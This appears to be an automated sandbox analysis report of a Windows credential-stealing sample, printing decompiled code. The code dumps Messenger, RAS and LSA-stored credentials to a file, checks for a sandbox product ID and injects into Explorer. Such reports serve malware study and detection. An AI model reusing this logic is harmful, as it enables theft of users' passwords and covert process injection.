                                    • String ID: DialParamsUID$RAS Passwords |
                                    • API String ID: 606077693-3751168726
                                    • Opcode ID: fbe06dde2b49a42d26d1befe1d029615117769fb4e2dbfe38565cae11eece56a
                                    • Instruction ID: 7375f334a108091beab50651aa9ecc72c5d4f12faf085ce0e41049e672a00ba2
                                    • Opcode Fuzzy Hash: fbe06dde2b49a42d26d1befe1d029615117769fb4e2dbfe38565cae11eece56a
                                    • Instruction Fuzzy Hash: 45B12070E002199BDB10EFA5CD82BDEB7B9AF44308F1045BBE544B72D1DB78AE458B58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00409D28, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 109libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 60%
                                    			E00409D28(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				struct HINSTANCE__* _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				void* _t47;
				intOrPtr* _t70;
				void* _t74;
				intOrPtr _t76;
				intOrPtr _t78;
				signed int _t90;
				void* _t91;
				intOrPtr _t93;

				_t89 = __esi;
				_t70 = __eax;
				 *[fs:eax] = _t93;
				E00401AC0(__eax);
				_v16 = LoadLibraryA("advapi32.dll");
				 *0x40f1dc = GetProcAddress(_v16, "CredEnumerateA");
				 *0x40f1e0 = GetProcAddress(_v16, "CredFree");
				 *0x40f1dc("WindowsLive:name=*", 0,  &_v12,  &_v8,  *[fs:eax], 0x409e71, _t93, __edi, __esi, __ebx, 0, 0, 0, 0, 0, 0, 0, 0, _t91);
				if(_v12 != 0) {
					_t47 = _v12 - 1;
					if(_t47 >= 0) {
						_v20 = _t47 + 1;
						_t90 = 0;
						do {
							_push( *_t70);
							_push("Messenger|");
							E00401CAC( &_v24,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x30)));
							_push(_v24);
							_push(0x409edc);
							E00401E10();
							_push( *_t70);
							E00409C1C( *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x1c)), _t70,  &_v32,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x18)),  *((intOrPtr*)(_v8 + _t90 * 4)), _t90);
							_push(_v32);
							_push(0x409edc);
							E00401E10();
							E00401CAC(_t70, E00401F48(_v28));
							_t90 = _t90 + 1;
							_t21 =  &_v20;
							 *_t21 = _v20 - 1;
							_t97 =  *_t21;
						} while ( *_t21 != 0);
					}
					FreeLibrary(_v16);
					_push(E00401D50( *_t70));
					E00406008( &_v36);
					E00401D58( &_v36, "xxxyyyzzz.dat");
					_pop(_t74);
					E00405D70(_v36, _t70, _t74,  *_t70, _t89, _t97);
				}
				_pop(_t76);
				 *[fs:eax] = _t76;
				_push(E00409E78);
				E00401AE4( &_v36, 4);
				_t78 =  *0x409bec; // 0x409bf0
				return E00402FC8( &_v8, _t78);
			}



















                                    0x00409d28
                                    0x00409d38
                                    0x00409d45
                                    0x00409d4a
                                    0x00409d59
                                    0x00409d6a
                                    0x00409d7d
                                    0x00409d91
                                    0x00409d9b
                                    0x00409da4
                                    0x00409da7
                                    0x00409daa
                                    0x00409dad
                                    0x00409daf
                                    0x00409daf
                                    0x00409db1
                                    0x00409dc2
                                    0x00409dc7
                                    0x00409dca
                                    0x00409dd6
                                    0x00409ddb
                                    0x00409de6
                                    0x00409deb
                                    0x00409dee
                                    0x00409dfb
                                    0x00409e0c
                                    0x00409e11
                                    0x00409e12
                                    0x00409e12
                                    0x00409e12
                                    0x00409e12
                                    0x00409daf
                                    0x00409e1b
                                    0x00409e27
                                    0x00409e2b
                                    0x00409e38
                                    0x00409e42
                                    0x00409e43
                                    0x00409e43
                                    0x00409e4a
                                    0x00409e4d
                                    0x00409e50
                                    0x00409e5d
                                    0x00409e65
                                    0x00409e70

                                    APIs
                                    • LoadLibraryA.KERNEL32(advapi32.dll,00000000,00409E71,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409D54
                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00409D65
                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 00409D78
                                    • FreeLibrary.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryProc$FreeLoad
                                    • String ID: CredEnumerateA$CredFree$Messenger|$WindowsLive:name=*$advapi32.dll$xxxyyyzzz.dat
                                    • API String ID: 2256533930-2325380974
                                    • Opcode ID: f9fba9f8a1e8e21ee8b509bdb417b60c27fbde2a90de665e2bcbe9999123e56f
                                    • Instruction ID: 58c175fa7aa483102e543733577c5d45540cb7646ec2fd880dc3ea0f10caa25c
                                    • Opcode Fuzzy Hash: f9fba9f8a1e8e21ee8b509bdb417b60c27fbde2a90de665e2bcbe9999123e56f
                                    • Instruction Fuzzy Hash: 28311D75A00209AFDB01EFA5C842A9EB7B9EB48704B60447BF501B72D2D778ED058B98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040806C, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 83libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 77%
                                    			E0040806C(void* __eax, void* __ebx, void* __esi) {
				char _v8;
				char _v12;
				CHAR* _t11;
				struct HINSTANCE__* _t12;
				CHAR* _t18;
				struct HINSTANCE__* _t19;
				CHAR* _t24;
				struct HINSTANCE__* _t25;
				CHAR* _t30;
				struct HINSTANCE__* _t31;
				intOrPtr _t44;
				intOrPtr _t51;

				_push(0);
				_push(0);
				_t48 = __eax;
				_push(_t51);
				_push(0x408182);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51;
				if( *0x40d094 != 0) {
					if( *0x40d098 == 0) {
						E00401D9C( &_v12, 0x4081ac, __eax);
						_t11 = E00401F48(_v12);
						_t12 =  *0x40e9b8; // 0x0
						GetProcAddress(_t12, _t11);
					} else {
						_t18 = E00401F48(__eax);
						_t19 =  *0x40e9b8; // 0x0
						GetProcAddress(_t19, _t18);
					}
					L11:
					_pop(_t44);
					 *[fs:eax] = _t44;
					_push(E00408189);
					return E00401AE4( &_v12, 2);
				}
				 *0x40e9b8 = LoadLibraryA("rasapi32.dll");
				if( *0x40e9b8 == 0) {
					 *0x40e9b8 = LoadLibraryA("rnaph.dll");
					L5:
					if( *0x40e9b8 != 0) {
						_t24 = E00401F48(_t48);
						_t25 =  *0x40e9b8; // 0x0
						if(GetProcAddress(_t25, _t24) != 0) {
							 *0x40d094 = 1;
							 *0x40d098 = 1;
						}
					}
					goto L11;
				}
				E00401D9C( &_v8, 0x4081ac, _t48);
				_t30 = E00401F48(_v8);
				_t31 =  *0x40e9b8; // 0x0
				if(GetProcAddress(_t31, _t30) == 0) {
					goto L5;
				} else {
					 *0x40d094 = 1;
					goto L11;
				}
			}















                                    0x0040806f
                                    0x00408071
                                    0x00408075
                                    0x00408079
                                    0x0040807a
                                    0x0040807f
                                    0x00408082
                                    0x0040808e
                                    0x00408129
                                    0x0040814c
                                    0x00408154
                                    0x0040815a
                                    0x00408160
                                    0x0040812b
                                    0x0040812d
                                    0x00408133
                                    0x00408139
                                    0x0040813e
                                    0x00408167
                                    0x00408169
                                    0x0040816c
                                    0x0040816f
                                    0x00408181
                                    0x00408181
                                    0x0040809e
                                    0x004080aa
                                    0x004080eb
                                    0x004080f0
                                    0x004080f7
                                    0x004080fb
                                    0x00408101
                                    0x00408110
                                    0x00408112
                                    0x00408119
                                    0x00408119
                                    0x00408110
                                    0x00000000
                                    0x004080f7
                                    0x004080b6
                                    0x004080be
                                    0x004080c4
                                    0x004080d3
                                    0x00000000
                                    0x004080d5
                                    0x004080d5
                                    0x00000000
                                    0x004080d5

                                    APIs
                                    • LoadLibraryA.KERNEL32(rasapi32.dll,00000000,00408182,?,?,?,00000000,00000000), ref: 00408099
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004080CA
                                    • LoadLibraryA.KERNEL32(rnaph.dll,rasapi32.dll,00000000,00408182,?,?,?,00000000,00000000), ref: 004080E6
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408107
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408139
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408160
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: rasapi32.dll$rnaph.dll
                                    • API String ID: 2238633743-3306964077
                                    • Opcode ID: 55af25baebdb74a9f019e34cf259ce010ede8285420b2e199dd43019a3ddbeb4
                                    • Instruction ID: b6a237a201236b193b27059562e9ff659002eca3acc9512b3faa464904049123
                                    • Opcode Fuzzy Hash: 55af25baebdb74a9f019e34cf259ce010ede8285420b2e199dd43019a3ddbeb4
                                    • Instruction Fuzzy Hash: 88218070604240AFE765EBB59F42B5A369C9B08308F14487EF184BB3D2CB7C9D96835D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004063FC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 44%
                                    			E004063FC(long __eax, intOrPtr* __edx) {
				void* _v8;
				void* _t8;
				_Unknown_base(*)()* _t13;
				intOrPtr* _t29;
				intOrPtr _t37;
				long _t43;
				intOrPtr _t47;
				intOrPtr _t49;

				_t47 = _t49;
				_t29 = __edx;
				_t43 = __eax;
				E00401AC0(__edx);
				_t8 = OpenProcess(0x410, 0, _t43);
				_v8 = _t8;
				if(_v8 == 0) {
					return _t8;
				} else {
					_push(_t47);
					_push(0x4064a9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t49;
					E00402074(_t29, 0x104);
					_t13 = GetProcAddress(LoadLibraryA("PSAPI.dll"), "GetModuleFileNameExA");
					_push(0x104);
					_push(E00401F48( *_t29));
					_push(0);
					_push(_v8);
					if( *_t13() <= 0) {
						E00401AC0(_t29);
					} else {
						E00402074(_t29, E004063EC(E00401F48( *_t29)));
					}
					_pop(_t37);
					 *[fs:eax] = _t37;
					_push(0x4064b0);
					return CloseHandle(_v8);
				}
			}











                                    0x004063fd
                                    0x00406403
                                    0x00406405
                                    0x00406409
                                    0x00406416
                                    0x0040641b
                                    0x00406422
                                    0x004064b5
                                    0x00406428
                                    0x0040642a
                                    0x0040642b
                                    0x00406430
                                    0x00406433
                                    0x0040643d
                                    0x00406454
                                    0x0040645b
                                    0x00406467
                                    0x00406468
                                    0x0040646d
                                    0x00406472
                                    0x0040648d
                                    0x00406474
                                    0x00406484
                                    0x00406484
                                    0x00406494
                                    0x00406497
                                    0x0040649a
                                    0x004064a8
                                    0x004064a8

                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 00406416
                                    • LoadLibraryA.KERNEL32(PSAPI.dll,00000000,004064A9,?,00000410,00000000), ref: 00406447
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00406454
                                    • CloseHandle.KERNEL32(00000000,004064B0), ref: 004064A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseHandleLibraryLoadOpenProcProcess
                                    • String ID: GetModuleFileNameExA$PSAPI.dll
                                    • API String ID: 1615691095-1155842389
                                    • Opcode ID: 34dc980cf4f2a7fd831d151ab6873525964aba32a0d2202ab22ca7c57c0dba9d
                                    • Instruction ID: bd0c567add07f6e237ff98e8278f53c40e5ea01a94fcde37a46f9e1c644737da
                                    • Opcode Fuzzy Hash: 34dc980cf4f2a7fd831d151ab6873525964aba32a0d2202ab22ca7c57c0dba9d
                                    • Instruction Fuzzy Hash: 2911AC71700200BFE710BABA8D42B5A76DCDB85B58F22087BF606F72C1D9BD9D10826C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004063FA, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 44%
                                    			E004063FA(long __eax, intOrPtr* __edx) {
				void* _v8;
				void* _t8;
				_Unknown_base(*)()* _t13;
				intOrPtr* _t29;
				intOrPtr _t37;
				long _t43;
				intOrPtr _t47;
				intOrPtr _t49;

				_t47 = _t49;
				_t29 = __edx;
				_t43 = __eax;
				E00401AC0(__edx);
				_t8 = OpenProcess(0x410, 0, _t43);
				_v8 = _t8;
				if(_v8 == 0) {
					return _t8;
				} else {
					_push(_t47);
					_push(0x4064a9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t49;
					E00402074(_t29, 0x104);
					_t13 = GetProcAddress(LoadLibraryA("PSAPI.dll"), "GetModuleFileNameExA");
					_push(0x104);
					_push(E00401F48( *_t29));
					_push(0);
					_push(_v8);
					if( *_t13() <= 0) {
						E00401AC0(_t29);
					} else {
						E00402074(_t29, E004063EC(E00401F48( *_t29)));
					}
					_pop(_t37);
					 *[fs:eax] = _t37;
					_push(0x4064b0);
					return CloseHandle(_v8);
				}
			}











                                    0x004063fd
                                    0x00406403
                                    0x00406405
                                    0x00406409
                                    0x00406416
                                    0x0040641b
                                    0x00406422
                                    0x004064b5
                                    0x00406428
                                    0x0040642a
                                    0x0040642b
                                    0x00406430
                                    0x00406433
                                    0x0040643d
                                    0x00406454
                                    0x0040645b
                                    0x00406467
                                    0x00406468
                                    0x0040646d
                                    0x00406472
                                    0x0040648d
                                    0x00406474
                                    0x00406484
                                    0x00406484
                                    0x00406494
                                    0x00406497
                                    0x0040649a
                                    0x004064a8
                                    0x004064a8

                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 00406416
                                    • LoadLibraryA.KERNEL32(PSAPI.dll,00000000,004064A9,?,00000410,00000000), ref: 00406447
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00406454
                                    • CloseHandle.KERNEL32(00000000,004064B0), ref: 004064A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseHandleLibraryLoadOpenProcProcess
                                    • String ID: GetModuleFileNameExA$PSAPI.dll
                                    • API String ID: 1615691095-1155842389
                                    • Opcode ID: f2e890fb100c779158ee0d0c02977e72756713ffdb478278039f87d933b76d46
                                    • Instruction ID: 60ef08ce5071abddf90c8e8173ba23e59c29dd9c076ad28b438bd73e609ca94b
                                    • Opcode Fuzzy Hash: f2e890fb100c779158ee0d0c02977e72756713ffdb478278039f87d933b76d46
                                    • Instruction Fuzzy Hash: 4501AD70700200BFE710AABA8C42F6B76DCDB45B48F52047ABA01F73C1D9BD9D10826C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405334, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00405334() {
				char _v264;
				int _v268;
				void* _v272;
				int _t15;

				_t15 = 0;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268) == 0) {
					_v268 = 0x101;
					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268);
					if( &_v264 == "55274-640-2673064-23950") {
						_t15 = 1;
					}
				}
				RegCloseKey(_v272);
				return _t15;
			}







                                    0x0040533b
                                    0x00405353
                                    0x00405355
                                    0x00405375
                                    0x00405383
                                    0x00405385
                                    0x00405385
                                    0x00405383
                                    0x0040538b
                                    0x00405399

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 0040534C
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000), ref: 00405375
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 0040538B
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405342
                                    • ProductId, xrefs: 0040536B
                                    • 55274-640-2673064-23950, xrefs: 0040537E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 55274-640-2673064-23950$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-2078682219
                                    • Opcode ID: c0118b20f9d138ef04f85378126d5ddbdcb88360979bbdc8f5c9746bacb04c32
                                    • Instruction ID: 1e6d94a0f8f115d3a99371f43301c37098f18dfbe8dcc5c06d224e81d40a16f2
                                    • Opcode Fuzzy Hash: c0118b20f9d138ef04f85378126d5ddbdcb88360979bbdc8f5c9746bacb04c32
                                    • Instruction Fuzzy Hash: 66F012706447007AD610DA94CC82F9FB79CDB51754F20483AFD44FA1C1D2FDE9489B6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00407CAC, Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 60%
                                    			E00407CAC(void* __eax, void* __ebx, void* __ecx) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				union _SID_NAME_USE _v24;
				void* _v28;
				void _v284;
				char _v540;
				void* _t50;
				intOrPtr _t56;
				void* _t60;

				_v8 = 0;
				_t50 = __eax;
				_push(_t60);
				_push(0x407d81);
				_push( *[fs:eax]);
				 *[fs:eax] = _t60 + 0xfffffde8;
				E00401AC0(__eax);
				E00402074( &_v8, 0x100);
				_v12 = 0xff;
				if(GetUserNameA(E00401F9C( &_v8),  &_v12) != 0) {
					_v16 = 0xff;
					_v20 = 0xff;
					if(LookupAccountNameA(0, E00401F9C( &_v8),  &_v284,  &_v16,  &_v540,  &_v20,  &_v24) != 0 && IsValidSid( &_v284) != 0) {
						_push( &_v28);
						_push( &_v284);
						L00407B54();
						E00401CAC(_t50, _v28);
						GlobalFree(_v28);
					}
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(E00407D88);
				return E00401AC0( &_v8);
			}














                                    0x00407cb8
                                    0x00407cbb
                                    0x00407cbf
                                    0x00407cc0
                                    0x00407cc5
                                    0x00407cc8
                                    0x00407ccd
                                    0x00407cda
                                    0x00407cdf
                                    0x00407cfa
                                    0x00407cfc
                                    0x00407d03
                                    0x00407d36
                                    0x00407d4b
                                    0x00407d52
                                    0x00407d53
                                    0x00407d5d
                                    0x00407d66
                                    0x00407d66
                                    0x00407d36
                                    0x00407d6d
                                    0x00407d70
                                    0x00407d73
                                    0x00407d80

                                    APIs
                                    • GetUserNameA.ADVAPI32(00000000,000000FF), ref: 00407CF3
                                    • LookupAccountNameA.ADVAPI32(00000000,00000000,?,000000FF,?,000000FF,?), ref: 00407D2F
                                    • IsValidSid.ADVAPI32(?,00000000,000000FF,00000000,00407D81), ref: 00407D3F
                                    • ConvertSidToStringSidA.ADVAPI32(?,?), ref: 00407D53
                                    • GlobalFree.KERNEL32(?), ref: 00407D66
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Name$AccountConvertFreeGlobalLookupStringUserValid
                                    • String ID:
                                    • API String ID: 1214381313-0
                                    • Opcode ID: dfbf4bc8963bd33455960da19a5772793724345ee772b9ee4943a9215a9d1581
                                    • Instruction ID: cb8f30fe2752fb84fa2a751701b307f0b12e4b3c054cd12de1de141c6e833035
                                    • Opcode Fuzzy Hash: dfbf4bc8963bd33455960da19a5772793724345ee772b9ee4943a9215a9d1581
                                    • Instruction Fuzzy Hash: 0A214F71D0420DABDB11EFA1CD829EFB7BCAF08304F504577B500F2191EB38AB458A69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040AFB0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60threadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 63%
                                    			E0040AFB0(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				long _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _t49;
				void* _t55;

				_v20 = 0;
				_v16 = 0;
				_push(_t55);
				_push(0x40b062);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffff0;
				E004013A4(0,  &_v16);
				_t52 = E00401F48(_v16);
				GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", 0),  &_v8);
				_t37 = OpenProcess(0x1f0fff, 0, _v8);
				E00401CAC( &_v20, _t17);
				_v12 = E0040AEBC(_t22, E00401D50(_v20), _t52);
				E0040AF08(_t37, E0040AEBC(_t37, 4,  &_v12), E0040AE94);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(E0040B069);
				return E00401AE4( &_v20, 2);
			}









                                    0x0040afba
                                    0x0040afbd
                                    0x0040afc2
                                    0x0040afc3
                                    0x0040afc8
                                    0x0040afcb
                                    0x0040afd3
                                    0x0040afe0
                                    0x0040aff3
                                    0x0040b008
                                    0x0040b00f
                                    0x0040b027
                                    0x0040b042
                                    0x0040b049
                                    0x0040b04c
                                    0x0040b04f
                                    0x0040b061

                                    APIs
                                      • Part of subcall function 004013A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,00406A79,00000000,00406ABE,?,?,?,?,00000000), ref: 004013C8
                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0040AFED
                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040AFF3
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,0040B062), ref: 0040B003
                                      • Part of subcall function 0040AEBC: VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 0040AED4
                                      • Part of subcall function 0040AEBC: VirtualProtectEx.KERNEL32(00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 0040AEE5
                                      • Part of subcall function 0040AEBC: WriteProcessMemory.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 0040AEF3
                                      • Part of subcall function 0040AF08: GetModuleHandleA.KERNEL32(00000000), ref: 0040AF20
                                      • Part of subcall function 0040AF08: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,?,00000000), ref: 0040AF4A
                                      • Part of subcall function 0040AF08: VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF59
                                      • Part of subcall function 0040AF08: GetModuleHandleA.KERNEL32(00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF6C
                                      • Part of subcall function 0040AF08: WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 0040AF74
                                      • Part of subcall function 0040AF08: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040AF95
                                      • Part of subcall function 0040AF08: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0040AF9B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessVirtual$HandleModule$AllocMemoryThreadWindowWrite$CloseCreateFileFindFreeNameOpenProtectRemote
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 1977168033-2988720461
                                    • Opcode ID: a52c62318053698575c4eba3688c10b841fefbfd621b91d5bb385f6faa68fac7
                                    • Instruction ID: a49b11f00c6fdd64156e7e0e0219d8fdfe2ddc0dda215ebd071a12db30bd13ac
                                    • Opcode Fuzzy Hash: a52c62318053698575c4eba3688c10b841fefbfd621b91d5bb385f6faa68fac7
                                    • Instruction Fuzzy Hash: 8C116D70B502086BDB01EBB58C42A9E76A8EB48704F60497AB410F73D1EA789E04879C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00407E40, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 45%
                                    			E00407E40(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed short* _v8;
				intOrPtr _v12;
				char _v16;
				void* _t23;
				intOrPtr _t50;
				intOrPtr _t58;
				void* _t59;

				_t59 = __eflags;
				_t55 = __esi;
				_t54 = __edi;
				_t41 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(_t58);
				_push(0x407ef8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t58;
				_push("RasDialParams!");
				E00407CAC( &_v16, __ebx, __ecx);
				_push(_v16);
				_push(0x407f24);
				E00401E10();
				_t23 = E00407DD0(4,  &_v8, _v12, _t59);
				_t60 = _t23;
				if(_t23 != 0) {
					E00407B94(_v8[2], __ebx,  *_v8 & 0x0000ffff, __edi, __esi);
					_push(_v8[2]);
					L00407B74();
				}
				if(E00407DD0(4,  &_v8, "L$_RasDefaultCredentials#0", _t60) != 0) {
					E00407B94(_v8[2], _t41,  *_v8 & 0x0000ffff, _t54, _t55);
					_push(_v8[2]);
					L00407B74();
				}
				_pop(_t50);
				 *[fs:eax] = _t50;
				_push(E00407EFF);
				return E00401AE4( &_v16, 2);
			}










                                    0x00407e40
                                    0x00407e40
                                    0x00407e40
                                    0x00407e40
                                    0x00407e43
                                    0x00407e45
                                    0x00407e47
                                    0x00407e4b
                                    0x00407e4c
                                    0x00407e51
                                    0x00407e54
                                    0x00407e57
                                    0x00407e5f
                                    0x00407e64
                                    0x00407e67
                                    0x00407e74
                                    0x00407e84
                                    0x00407e89
                                    0x00407e8b
                                    0x00407e99
                                    0x00407ea4
                                    0x00407ea5
                                    0x00407ea5
                                    0x00407ebe
